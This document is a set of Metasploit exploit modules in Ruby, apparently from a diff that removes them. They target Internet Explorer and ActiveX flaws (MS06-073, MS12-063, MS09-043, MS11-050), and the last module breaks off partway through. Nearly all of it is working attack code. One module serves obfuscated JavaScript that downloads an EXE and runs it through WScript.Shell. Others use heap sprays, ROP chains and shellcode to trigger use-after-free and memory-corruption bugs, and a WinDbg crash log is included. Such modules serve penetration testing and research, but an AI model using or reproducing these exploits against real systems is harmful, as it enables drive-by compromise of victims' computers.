[ 'MS06-073 - WMIScriptUtils.WMIObjectBroker2.1', { 'CLSID' => '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'} ],
|
||||
|
||||
# These are restricted by site (might be exploitable via DNS spoofing + SSL fun)
|
||||
[ 'UNKNOWN - SoftwareDistribution.MicrosoftUpdateWebControl.1', { 'CLSID' => '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'} ],
|
||||
[ 'UNKNOWN - SoftwareDistribution.WebControl.1', { 'CLSID' => '{6414512B-B978-451D-A0D8-FCFDF33E833C}'} ],
|
||||
|
||||
# Visual Studio components, not marked as safe
|
||||
[ 'UNKNOWN - VsmIDE.DTE', { 'CLSID' => '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'} ],
|
||||
[ 'UNKNOWN - DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ],
|
||||
[ 'UNKNOWN - VisualStudio.DTE.8.0', { 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ],
|
||||
[ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', { 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ],
|
||||
[ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ],
|
||||
|
||||
#
|
||||
# The controls below can launch the "installing component" dialogs...
|
||||
#
|
||||
|
||||
# Not marked as safe
|
||||
[ 'UNKNOWN - Business Object Factory ', { 'CLSID' => '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'} ],
|
||||
|
||||
# Not marked as safe
|
||||
[ 'UNKNOWN - Outlook Data Object', { 'CLSID' => '{0006F033-0000-0000-C000-000000000046}'} ],
|
||||
|
||||
# Found exploitable in the wild (no details)
|
||||
[ 'UNKNOWN - Outlook.Application', { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ],
|
||||
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Apr 11 2006'))
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
if (request.uri.match(/payload/))
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
data = generate_payload_exe({ :code => p.encoded })
|
||||
print_status("Sending EXE payload")
|
||||
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
|
||||
return
|
||||
end
|
||||
|
||||
# Build out the HTML response page
|
||||
var_html = rand_text_alpha(rand(30)+2)
|
||||
var_func_exploit = rand_text_alpha(rand(30)+2);
|
||||
var_func_go = rand_text_alpha(rand(30)+2);
|
||||
var_func_createo = rand_text_alpha(rand(30)+2);
|
||||
var_exe_name = rand_text_alpha(rand(30)+2);
|
||||
var_objects = ''
|
||||
|
||||
# Build the object list based on target selection
|
||||
if (target.name == 'Automatic')
|
||||
targets.each do |t|
|
||||
next if not t['CLSID']
|
||||
var_objects += t['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + ","
|
||||
end
|
||||
else
|
||||
var_objects += target['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + ","
|
||||
end
|
||||
|
||||
|
||||
content = %Q^
|
||||
<html><head><title></title>
|
||||
<script language="javascript">
|
||||
|
||||
function #{var_func_createo}( o , n ) {
|
||||
var r = null;
|
||||
|
||||
try { eval("r=o" + ".C" + "re" + "ate" + "Ob" + "je" + "ct(n)" ) }catch(e){}
|
||||
|
||||
if (! r) {
|
||||
try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'')" ) }catch(e){}
|
||||
}
|
||||
|
||||
if (! r) {
|
||||
try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'','')" ) }catch(e){}
|
||||
}
|
||||
|
||||
if (! r) {
|
||||
try { eval("r=o" + ".Ge" + "tOb" + "je" + "ct('',n)" ) }catch(e){}
|
||||
}
|
||||
|
||||
if (! r) {
|
||||
try { eval("r=o" + ".Ge" + "tOb" + "ject(n,'')" ) }catch(e){}
|
||||
}
|
||||
|
||||
if (! r) {
|
||||
try { eval("r=o" + ".Ge" + "tOb" + "ject(n)" ) }catch(e){}
|
||||
}
|
||||
|
||||
return( r );
|
||||
}
|
||||
|
||||
function #{var_func_go}( a ) {
|
||||
|
||||
var s = #{var_func_createo}( a, "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" );
|
||||
|
||||
var o = #{var_func_createo}( a, "A" + "DO" + "D" + "B.S" + "tr" + "eam" );
|
||||
|
||||
var e = s.Environment( "P" + "ro" + "ce" + "ss" );
|
||||
|
||||
|
||||
var url = document.location + '/p' + 'ay' + 'lo' + 'ad';
|
||||
var xml = null;
|
||||
var bin = e.Item( "T" + "E" + "M" + "P" ) + "\\\\#{var_exe_name}" + ".e" + "xe";
|
||||
var dat;
|
||||
|
||||
try { xml=new XMLHttpRequest(); }
|
||||
catch(e) {
|
||||
try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
|
||||
catch(e) {
|
||||
xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
|
||||
}
|
||||
}
|
||||
|
||||
if (! xml) {
|
||||
return(0);
|
||||
}
|
||||
|
||||
xml.open("GET", url, false);
|
||||
xml.send(null);
|
||||
dat = xml.responseBody;
|
||||
|
||||
o.Type = 1 ;
|
||||
o.Mode = 3 ;
|
||||
o.Open ( ) ;
|
||||
o.Write ( dat ) ;
|
||||
o.SaveToFile ( bin, 2) ;
|
||||
|
||||
s.Run ( bin , 0 );
|
||||
}
|
||||
|
||||
function #{var_func_exploit}( ) {
|
||||
var i = 0;
|
||||
var t = new Array( #{var_objects} null );
|
||||
|
||||
while (t[i]) {
|
||||
var a = null;
|
||||
|
||||
if (t[i].substring(0,1) == '{') {
|
||||
a = document.createElement("object");
|
||||
a.setAttribute("cl" + "as" + "sid", "cl" + "s" + "id" +":" + t[i].substring( 1, t[i].length - 1 ) ) ;
|
||||
} else {
|
||||
try { a = new ActiveXObject(t[i]); } catch(e){}
|
||||
}
|
||||
|
||||
if (a) {
|
||||
try {
|
||||
var b = #{var_func_createo}( a , "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" ) ;
|
||||
if (b) {
|
||||
#{var_func_go}( a ) ;
|
||||
return(0) ;
|
||||
}
|
||||
} catch(e){
|
||||
}
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
</script>
|
||||
</head>
|
||||
<body onload='#{var_func_exploit}()'>
|
||||
#{var_html}
|
||||
</body>
|
||||
</html>
|
||||
|
||||
^
|
||||
|
||||
|
||||
content = Rex::Text.randomize_space(content)
|
||||
|
||||
print_status("Sending exploit HTML...")
|
||||
|
||||
|
||||
# Transmit the response to the client
|
||||
send_response_html(cli, content)
|
||||
|
||||
# Handle the payload
|
||||
handler(cli)
|
||||
end
|
||||
end
@ -1,389 +0,0 @@
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::RopDb
|
||||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
autopwn_info({
|
||||
:ua_name => HttpClients::IE,
|
||||
:ua_minver => "7.0",
|
||||
:ua_maxver => "9.0",
|
||||
:javascript => true,
|
||||
:rank => GoodRanking
|
||||
})
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability ",
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When
|
||||
rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner,
|
||||
but the same memory is reused again later in the CMshtmlEd::Exec() function, leading
|
||||
to a use-after-free condition.
|
||||
|
||||
Please note that this vulnerability has been exploited in the wild since Sep 14 2012.
|
||||
|
||||
Also note that presently, this module has some target dependencies for the ROP chain to be
|
||||
valid. For WinXP SP3 with IE8, msvcrt must be present (as it is by default).
|
||||
For Vista or Win7 with IE8, or Win7 with IE9, JRE 1.6.x or below must be installed (which
|
||||
is often the case).
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'unknown', # via ZDI
|
||||
'eromang', # First public discovery
|
||||
'binjo',
|
||||
'sinn3r', # Metasploit
|
||||
'juan vazquez' # Metasploit
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2012-4969' ],
|
||||
[ 'OSVDB', '85532' ],
|
||||
[ 'MSB', 'MS12-063' ],
|
||||
[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2757760' ],
|
||||
[ 'URL', 'http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/' ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', {} ],
|
||||
[ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5fa', 'Random' => false } ],
|
||||
[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x5f4', 'Random' => false } ],
|
||||
[ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5fa', 'Random' => false } ],
|
||||
[ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Random' => false } ],
|
||||
[ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Random' => false } ],
|
||||
[ 'IE 9 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5fc', 'Random' => true } ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Sep 14 2012", # When it was spotted in the wild by eromang
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
|
||||
])
|
||||
|
||||
end
|
||||
|
||||
def get_target(agent)
|
||||
#If the user is already specified by the user, we'll just use that
|
||||
return target if target.name != 'Automatic'
|
||||
|
||||
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
|
||||
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
|
||||
|
||||
ie_name = "IE #{ie}"
|
||||
|
||||
case nt
|
||||
when '5.1'
|
||||
os_name = 'Windows XP SP3'
|
||||
when '6.0'
|
||||
os_name = 'Windows Vista'
|
||||
when '6.1'
|
||||
os_name = 'Windows 7'
|
||||
end
|
||||
|
||||
targets.each do |t|
|
||||
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
|
||||
vprint_status("Target selected as: #{t.name}")
|
||||
return t
|
||||
end
|
||||
end
|
||||
|
||||
return nil
|
||||
end
|
||||
|
||||
def junk(n=4)
|
||||
return rand_text_alpha(n).unpack("V")[0].to_i
|
||||
end
|
||||
|
||||
def nop
|
||||
return make_nops(4).unpack("V")[0].to_i
|
||||
end
|
||||
|
||||
def get_payload(t, cli)
|
||||
code = payload.encoded
|
||||
|
||||
# No rop. Just return the payload.
|
||||
return code if t['Rop'].nil?
|
||||
|
||||
# Both ROP chains generated by mona.py - See corelan.be
|
||||
case t['Rop']
|
||||
when :msvcrt
|
||||
print_status("Using msvcrt ROP")
|
||||
exec_size = code.length
|
||||
stack_pivot = [
|
||||
0x77c4e393, # RETN
|
||||
0x77c4e392, # POP EAX # RETN
|
||||
0x77c15ed5, # XCHG EAX, ESP # RETN
|
||||
].pack("V*")
|
||||
rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
|
||||
|
||||
else
|
||||
print_status("Using JRE ROP")
|
||||
exec_size = 0xffffffff - code.length + 1
|
||||
if t['Random']
|
||||
stack_pivot = [
|
||||
0x0c0c0c0c, # 0c0c0c08
|
||||
0x7c347f98, # RETN
|
||||
0x7c347f97, # POP EDX # RETN
|
||||
0x7c348b05 # XCHG EAX, ESP # RET
|
||||
].pack("V*")
|
||||
else
|
||||
stack_pivot = [
|
||||
0x7c347f98, # RETN
|
||||
0x7c347f97, # POP EDX # RETN
|
||||
0x7c348b05 # XCHG EAX, ESP # RET
|
||||
].pack("V*")
|
||||
end
|
||||
rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
|
||||
end
|
||||
|
||||
return rop_payload
|
||||
end
|
||||
|
||||
# Spray published by corelanc0d3r
|
||||
# Exploit writing tutorial part 11 : Heap Spraying Demystified
|
||||
# See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
|
||||
def get_random_spray(t, js_code, js_nops)
|
||||
randnop = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
spray = <<-JS
|
||||
|
||||
function randomblock(blocksize)
|
||||
{
|
||||
var theblock = "";
|
||||
for (var i = 0; i < blocksize; i++)
|
||||
{
|
||||
theblock += Math.floor(Math.random()*90)+10;
|
||||
}
|
||||
return theblock;
|
||||
}
|
||||
|
||||
function tounescape(block)
|
||||
{
|
||||
var blocklen = block.length;
|
||||
var unescapestr = "";
|
||||
for (var i = 0; i < blocklen-1; i=i+4)
|
||||
{
|
||||
unescapestr += "%u" + block.substring(i,i+4);
|
||||
}
|
||||
return unescapestr;
|
||||
}
|
||||
|
||||
var heap_obj = new heapLib.ie(0x10000);
|
||||
|
||||
var code = unescape("#{js_code}");
|
||||
var #{randnop} = "#{js_nops}";
|
||||
var nops = unescape(#{randnop});
|
||||
|
||||
while (nops.length < 0x80000) nops += nops;
|
||||
|
||||
var offset_length = #{t['Offset']};
|
||||
|
||||
for (var i=0; i < 0x1000; i++) {
|
||||
var padding = unescape(tounescape(randomblock(0x1000)));
|
||||
while (padding.length < 0x1000) padding+= padding;
|
||||
var junk_offset = padding.substring(0, offset_length);
|
||||
var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length);
|
||||
while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;
|
||||
sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);
|
||||
heap_obj.alloc(sprayblock);
|
||||
}
|
||||
|
||||
JS
|
||||
|
||||
return spray
|
||||
end
|
||||
|
||||
def get_spray(t, js_code, js_nops)
|
||||
randnop = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
js = <<-JS
|
||||
var heap_obj = new heapLib.ie(0x20000);
|
||||
var code = unescape("#{js_code}");
|
||||
var #{randnop} = "#{js_nops}";
|
||||
var nops = unescape(#{randnop});
|
||||
|
||||
while (nops.length < 0x80000) nops += nops;
|
||||
var offset = nops.substring(0, #{t['Offset']});
|
||||
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
|
||||
|
||||
while (shellcode.length < 0x40000) shellcode += shellcode;
|
||||
var block = shellcode.substring(0, (0x80000-6)/2);
|
||||
|
||||
heap_obj.gc();
|
||||
|
||||
for (var i=1; i < 0x300; i++) {
|
||||
heap_obj.alloc(block);
|
||||
}
|
||||
JS
|
||||
end
|
||||
|
||||
|
||||
def load_html1(cli, my_target)
|
||||
p = get_payload(my_target, cli)
|
||||
|
||||
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
|
||||
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
|
||||
js_r_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
|
||||
|
||||
if my_target['Random']
|
||||
js = get_random_spray(my_target, js_code, js_r_nops)
|
||||
else
|
||||
js = get_spray(my_target, js_code, js_nops)
|
||||
end
|
||||
|
||||
js = heaplib(js, {:noobfu => true})
|
||||
if datastore['OBFUSCATE']
|
||||
js = ::Rex::Exploitation::JSObfu.new(js)
|
||||
js.obfuscate(memory_sensitive: true)
|
||||
end
|
||||
|
||||
html = %Q|
|
||||
<html>
|
||||
<body>
|
||||
<script>
|
||||
var arrr = new Array();
|
||||
arrr[0] = window.document.createElement("img");
|
||||
arrr[0]["src"] = "#{Rex::Text.rand_text_alpha(1)}";
|
||||
</script>
|
||||
|
||||
<iframe src="#{this_resource}/#{@html2_name}"></iframe>
|
||||
<script>
|
||||
#{js}
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
|
|
||||
|
||||
return html
|
||||
end
|
||||
|
||||
def load_html2
|
||||
html = %Q|
|
||||
<HTML>
|
||||
<script>
|
||||
function funcB() {
|
||||
document.execCommand("selectAll");
|
||||
};
|
||||
|
||||
function funcA() {
|
||||
document.write("#{Rex::Text.rand_text_alpha(1)}");
|
||||
parent.arrr[0].src = "YMjf\\u0c08\\u0c0cKDogjsiIejengNEkoPDjfiJDIWUAzdfghjAAuUFGGBSIPPPUDFJKSOQJGH";
|
||||
}
|
||||
|
||||
</script>
|
||||
<body onload='funcB();' onselect='funcA()'>
|
||||
<div contenteditable='true'>
|
||||
a
|
||||
</div>
|
||||
</body>
|
||||
</HTML>
|
||||
|
|
||||
|
||||
return html
|
||||
end
|
||||
|
||||
def this_resource
|
||||
r = get_resource
|
||||
return ( r == '/') ? '' : r
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
uri = request.uri
|
||||
agent = request.headers['User-Agent']
|
||||
my_target = get_target(agent)
|
||||
|
||||
vprint_status("Requesting: #{uri}")
|
||||
print_status(agent)
|
||||
|
||||
# Avoid the attack if the victim doesn't have the same setup we're targeting
|
||||
if my_target.nil?
|
||||
print_error("Browser not supported, sending a 404: #{agent.to_s}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
if uri =~ /#{@html2_name}/
|
||||
print_status("Loading #{@html2_name}")
|
||||
html = load_html2
|
||||
elsif uri =~ /#{@html1_name}/
|
||||
print_status("Loading #{@html1_name}")
|
||||
html = load_html1(cli, my_target)
|
||||
elsif uri =~ /\/$/ or (!this_resource.empty? and uri =~ /#{this_resource}$/)
|
||||
print_status("Redirecting to #{@html1_name}")
|
||||
send_redirect(cli, "#{this_resource}/#{@html1_name}")
|
||||
return
|
||||
else
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
html = html.gsub(/^ {4}/, '')
|
||||
|
||||
send_response(cli, html, {'Content-Type'=>'text/html'})
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
@html1_name = "#{Rex::Text.rand_text_alpha(5)}.html"
|
||||
@html2_name = "#{Rex::Text.rand_text_alpha(6)}.html"
|
||||
super
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
=begin
|
||||
0:008> r
|
||||
eax=00000000 ebx=0000001f ecx=002376c8 edx=0000000d esi=00000000 edi=0c0c0c08
|
||||
eip=637d464e esp=020bbe80 ebp=020bbe8c iopl=0 nv up ei pl nz na pe nc
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
|
||||
mshtml!CMshtmlEd::Exec+0x134:
|
||||
637d464e 8b07 mov eax,dword ptr [edi] ds:0023:0c0c0c08=????????
|
||||
|
||||
0:008> u
|
||||
mshtml!CMshtmlEd::Exec+0x134:
|
||||
637d464e 8b07 mov eax,dword ptr [edi]
|
||||
637d4650 57 push edi
|
||||
637d4651 ff5008 call dword ptr [eax+8]
|
||||
|
||||
0:008> k
|
||||
ChildEBP RetAddr
|
||||
020bbe8c 637d4387 mshtml!CMshtmlEd::Exec+0x134
|
||||
020bbebc 637be2fc mshtml!CEditRouter::ExecEditCommand+0xd6
|
||||
020bc278 638afda7 mshtml!CDoc::ExecHelper+0x3c91
|
||||
020bc298 638ee2a9 mshtml!CDocument::Exec+0x24
|
||||
020bc2c0 638b167b mshtml!CBase::execCommand+0x50
|
||||
020bc2f8 638e7445 mshtml!CDocument::execCommand+0x93
|
||||
020bc370 636430c9 mshtml!Method_VARIANTBOOLp_BSTR_oDoVARIANTBOOL_o0oVARIANT+0x149
|
||||
020bc3e4 63643595 mshtml!CBase::ContextInvokeEx+0x5d1
|
||||
020bc410 63643832 mshtml!CBase::InvokeEx+0x25
|
||||
020bc460 635e1cdc mshtml!DispatchInvokeCollection+0x14b
|
||||
020bc4a8 63642f30 mshtml!CDocument::InvokeEx+0xf1
|
||||
020bc4d0 63642eec mshtml!CBase::VersionedInvokeEx+0x20
|
||||
020bc520 633a6d37 mshtml!PlainInvokeEx+0xea
|
||||
020bc560 633a6c75 jscript!IDispatchExInvokeEx2+0xf8
|
||||
020bc59c 633a9cfe jscript!IDispatchExInvokeEx+0x6a
|
||||
020bc65c 633a9f3c jscript!InvokeDispatchEx+0x98
|
||||
020bc690 633a77ff jscript!VAR::InvokeByName+0x135
|
||||
020bc6dc 633a85c7 jscript!VAR::InvokeDispName+0x7a
|
||||
020bc708 633a9c0b jscript!VAR::InvokeByDispID+0xce
|
||||
020bc8a4 633a5ab0 jscript!CScriptRuntime::Run+0x2989
|
||||
=end
|
|
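--- a/<PATH_UNKNOWN_1>
+++ /dev/null
@@ -1,131 +0,0 @@
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-class MetasploitModule < Msf::Exploit::Remote
-Rank = NormalRanking
-
-include Msf::Exploit::Remote::HttpServer::HTML
-
-def initialize(info = {})
-super(update_info(info,
-'Name' => 'Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption',
-'Description' => %q{
-This module exploits a memory corruption vulnerability within versions 10 and 11 of
-the Office Web Component Spreadsheet ActiveX control. This module was based on
-an exploit found in the wild.
-},
-'License' => MSF_LICENSE,
-'Author' => [ 'unknown', 'hdm', 'Ahmed Obied', 'DSR! <xchwarze[at]gmail.com>' ],
-'References' =>
-[
-[ 'CVE', '2009-1136' ],
-[ 'OSVDB', '55806' ],
-[ 'MSB', 'MS09-043' ],
-[ 'URL', 'http://ahmed.obied.net/software/code/exploits/ie_owc.py' ],
-[ 'EDB', '9163' ],
-# broken: [ 'URL', 'http://xeye.us/blog/2009/07/one-0day/' ],
-[ 'URL', 'http://www.microsoft.com/technet/security/advisory/973472.mspx' ],
-],
-'DefaultOptions' =>
-{
-'EXITFUNC' => 'process',
-},
-'Payload' =>
-{
-'Space' => 1024,
-'BadChars' => '',
-'StackAdjustment' => -3500,
-},
-'Platform' => 'win',
-'Targets' =>
-[
-[ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ] # other exploits use 0x0b0c0b0c
-],
-'DisclosureDate' => 'Jul 13 2009',
-'DefaultTarget' => 0))
-
-@javascript_encode_key = rand_text_alpha(rand(10) + 10)
-end
-
-def on_request_uri(cli, request)
-
-# Send a redirect with the javascript encoding key
-#if (!request.uri.match(/\?\w+/))
-# send_local_redirect(cli, "?#{@javascript_encode_key}")
-# return
-#end
-
-return if ((p = regenerate_payload(cli)) == nil)
-
-print_status("Sending #{self.name}")
-
-
-shellcode = Rex::Text.to_unescape(p.encoded)
-retaddr = Rex::Text.to_unescape([target.ret].pack('V'))
-
-js = %Q|
-var xshellcode = unescape("#{shellcode}");
-
-var xarray = new Array();
-var xls = 0x81000-(xshellcode.length*2);
-var xbigblock = unescape("#{retaddr}");
-
-while( xbigblock.length < xls / 2) { xbigblock += xbigblock; }
-var xlh = xbigblock.substring(0, xls / 2);
-delete xbigblock;
-
-for(xi=0; xi<0x99*2; xi++) {
-xarray[xi] = xlh + xlh + xshellcode;
-}
-
-CollectGarbage();
-
-var xobj;
-try {
-xobj = new ActiveXObject("OWC10.Spreadsheet");
-} catch(err) {
-try {
-xobj = new ActiveXObject("OWC11.Spreadsheet");
-} catch(err) {
-}
-}
-
-xe = new Array();
-xe.push(1);
-xe.push(2);
-xe.push(0);
-xe.push(window);
-
-for(xi=0; xi < xe.length; xi++){
-for(xj=0; xj<10; xj++){
-try { xobj.Evaluate(xe[xi]); } catch(e) { }
-}
-}
-
-window.status = xe[3] + '';
-
-for(xj=0; xj<10; xj++){
-try{ xobj.msDataSourceObject(xe[3]); } catch(e) { }
-}
-|
-
-# Obfuscate it up a bit
-js = obfuscate_js(js,
-'Symbols' => {
-'Variables' => %W{ xshellcode xarray xls xbigblock xlh xi xobj xe xj err}
-}
-).to_s
-
-
-# Encode the javascript payload with the URI key
-# js = encrypt_js(js, @javascript_encode_key)
-
-# Fire off the page to the client
-send_response(cli, "<html><script language='javascript'>#{js}</script></html>")
-
-# Handle the payload
-handler(cli)
-end
-end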
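--- a/<PATH_UNKNOWN_2>
+++ /dev/null
@@ -1,284 +0,0 @@
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-class MetasploitModule < Msf::Exploit::Remote
-Rank = NormalRanking
-
-include Msf::Exploit::Remote::HttpServer::HTML
-include Msf::Exploit::RopDb
-#include Msf::Exploit::Remote::BrowserAutopwn
-#autopwn_info({
-# :ua_name => HttpClients::IE,
-# :ua_minver => "7.0",
-# :ua_maxver => "8.0",
-# :javascript => true,
-# :os_name => OperatingSystems::Match::WINDOWS
-#})
-
-def initialize(info={})
-super(update_info(info,
-'Name' => "MS11-050 IE mshtml!CObjectElement Use After Free",
-'Description' => %q{
-This module exploits a use-after-free vulnerability in Internet Explorer. The
-vulnerability occurs when an invalid <object> tag exists and other elements
-overlap/cover where the object tag should be when rendered (due to their
-styles/positioning). The mshtml!CObjectElement is then freed from memory because
-it is invalid. However, the mshtml!CDisplay object for the page continues to keep
-a reference to the freed <object> and attempts to call a function on it, leading
-to the use-after-free.
-
-Please note that for IE 8 targets, JRE (Java Runtime Environment) is required
-to bypass DEP (Data Execution Prevention).
-},
-'License' => MSF_LICENSE,
-'Author' =>
-[
-'d0c_s4vage', #Discovery, poc
-'sinn3r', #ROP (thx corelanc0d3r), Windows 7
-'bannedit' #Windows 7
-],
-'References' =>
-[
-['CVE', '2011-1260'],
-['OSVDB', '72950'],
-['MSB', 'MS11-050'],
-['URL', 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html']
-],
-'DefaultOptions' =>
-{
-'EXITFUNC' => 'process',
-'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
-},
-'Payload' =>
-{
-'Space' => 500,
-'BadChars' => "\x00\x09\x0a\x0d'\\",
-'StackAdjustment' => -3500
-},
-'Platform' => 'win',
-'Targets' =>
-[
-[ 'Automatic', { } ],
-# In IE6 the mshtml!CObjectElement size is 0xac
-[
-'Internet Explorer 7 on XP SP3',
-{
-'Rop' => false,
-'Ret' => nil, #Not required for non-ROP targets
-'TargetAddr' => 0x0c0c0c0c, #For vtable
-'ObjSize' => '0xB0', #mshtml!CObjectElement size
-'Offset' => '0x01',
-}
-],
-[
-'Internet Explorer 7 on Windows Vista',
-{
-'Rop' => false,
-'Ret' => nil, #Not required for non-ROP targets
-'TargetAddr' => 0x0c0c0c0c, #For vtable
-'ObjSize' => '0xB0', #mshtml!CObjectElement size
-'Offset' => '0x01',
-}
-],
-[
-'Internet Explorer 8 on XP SP3',
-{
-'Rop' => true,
-'Ret' => 0x7C348B05, #Stack pivot (xchg eax,esp; retn from java)
-'TargetAddr' => 0x0c0c0c0c, #For vtable
-'ObjSize' => '0xE0', #mshtml!CObjectElement size
-'Offset' => '0x5E2',
-}
-],
-[
-'Internet Explorer 8 on Windows 7',
-{
-'Rop' => true,
-'Ret' => 0x7C348B05, #Stack pivot (xchg eax,esp; retn from java)
-'TargetAddr' => 0x0c0c0c0c, #For vtable
-'ObjSize' => '0xE0', #mshtml!CObjectElement size
-'Offset' => '0x5F4',
-}
-],
-[ 'Debug Target (Crash)', {} ],
-],
-'DisclosureDate' => "Jun 16 2011",
-'DefaultTarget' => 0))
-
-register_options(
-[
-OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-])
-end
-
-def auto_target(cli, request)
-agent = request.headers['User-Agent']
-
-if agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
-#Windows XP + IE7
-mytarget = targets[1]
-elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/
-#Windows Vista + IE7
-mytarget = targets[2]
-elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
-#Windows XP + IE8
-mytarget = targets[3]
-elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/
-#Windows 7 + IE8
-mytarget = targets[4]
-else
-mytarget = nil
-end
-
-return mytarget
-end
-
-def on_request_uri(cli, request)
-#Set default target
-mytarget = target
-debug = false
-
-if target.name == 'Automatic'
-mytarget = auto_target(cli, request)
-if mytarget.nil?
-agent = request.headers['User-Agent']
-print_error("Unknown User-Agent #{agent}")
-send_not_found(cli)
-return
-end
-elsif target.name =~ /Debug/
-debug = true
-end
-
-if debug
-data = <<-DATA
-<html>
-<body>
-<script language='javascript'>
-document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>TAG_1</object>";
-document.body.innerHTML += "<a id='tag_3' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";
-document.body.innerHTML += "AAAAAAA";
-document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";
-</script>
-</body>
-</html>
-DATA
-
-print_status("Triggering vulnerability (target: #{mytarget.name})...")
-send_response(cli, data, { 'Content-Type' => 'text/html' })
-return
-end
-
-if mytarget['Rop']
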